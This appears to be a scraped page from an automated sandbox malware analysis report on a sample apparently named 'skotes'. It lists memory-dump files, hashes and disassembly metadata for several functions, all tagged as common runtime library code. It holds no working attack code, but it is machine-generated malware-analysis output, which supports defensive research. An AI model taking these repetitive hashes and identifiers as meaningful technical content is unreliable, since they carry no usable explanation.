Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: b3fd092497d18a190bd7991764a65600974c89a9ea05f8cd30dd08ed13a7a659
Instruction ID: 601e35367c1452bf4fb48eb5ea6fac57bb75b905bf46983718ed5679f12a39c4
Opcode Fuzzy Hash: b3fd092497d18a190bd7991764a65600974c89a9ea05f8cd30dd08ed13a7a659
Instruction Fuzzy Hash: BB211D75A00119AFDF01FFA5D8819BEB7B9EF08714F10046AFA01B7291DB389D019BA5

Function 00499C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00499C9C
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00499CE8
std::bad_exception::bad_exception.LIBCMT ref: 00499CFE
std::bad_exception::bad_exception.LIBCMT ref: 00499D6A

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: 6d5e009ed878f155ca1f282ee7eada13eca00b4fb09f3ec3b035d181262fdcea
Instruction ID: 927371b39def04195a05fe23e327577ce65d4897f9ffb9f1651642d47547327a
Opcode Fuzzy Hash: 6d5e009ed878f155ca1f282ee7eada13eca00b4fb09f3ec3b035d181262fdcea
Instruction Fuzzy Hash: 3B2192759002049FDF04EF69D882E9EBBB4AF15314B20407FF001AB292EB396D01CB59

Function 0049A026 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0049A069

Part of subcall function 0049B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0049B5AF

Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0049A07F
Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0049A0CB

Part of subcall function 0049AB41: List.LIBCONCRT ref: 0049AB77

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0049A0DB

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
String ID:
API String ID: 932774601-0
Opcode ID: ec175e181c0ac5b4b71928a9c67136943483ba02e807ada5b626f2f65f7fb784
Instruction ID: f171cdf747bdc345913af2200236c527f904e201fb10e9ca1bc1c35924284357
Opcode Fuzzy Hash: ec175e181c0ac5b4b71928a9c67136943483ba02e807ada5b626f2f65f7fb784
Instruction Fuzzy Hash: C721DC31500B149FCB25EF66D9908ABF7F5FF48314700492EE942A7651CB38F801CBAA

Function 00494885 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00494893
ListArray.LIBCONCRT ref: 004948A5

Part of subcall function 00495555: _InternalDeleteHelper.LIBCONCRT ref: 00495564

ListArray.LIBCONCRT ref: 004948AF
_InternalDeleteHelper.LIBCONCRT ref: 004948C8

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 85c87950620d8e031c290cc927ed79baf1a04ddb0c7223e2509defe8dab3c14c
Instruction ID: 3bcc4b36fd715ef2ee0ef5c848c0f6589496e8f554fec7f519d3111b1d2c3386
Opcode Fuzzy Hash: 85c87950620d8e031c290cc927ed79baf1a04ddb0c7223e2509defe8dab3c14c
Instruction Fuzzy Hash: 9D012B716015117FCF11FB56D886E6EBF2ABF84724701043FF40497652DB18EC1287A4

Function 0049EE5C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0049EE6A
ListArray.LIBCONCRT ref: 0049EE7C

Part of subcall function 0049EF29: _InternalDeleteHelper.LIBCONCRT ref: 0049EF3B

ListArray.LIBCONCRT ref: 0049EE86
_InternalDeleteHelper.LIBCONCRT ref: 0049EE9F

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 2454b121aa889f753a7f2cd33cd7c67b4c90c6f0db288f0c80c153a35adc7694
Instruction ID: 72ff07cdbf571d0dbced7181932a47abbd8dd5f09582f51671c968b0033da134
Opcode Fuzzy Hash: 2454b121aa889f753a7f2cd33cd7c67b4c90c6f0db288f0c80c153a35adc7694
Instruction Fuzzy Hash: B3016231601521BBCE25FB63D8C6DAEBF69BF84714705043FF50497652DB28EC119798

Function 0049D0B7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0049D0C5
ListArray.LIBCONCRT ref: 0049D0D7

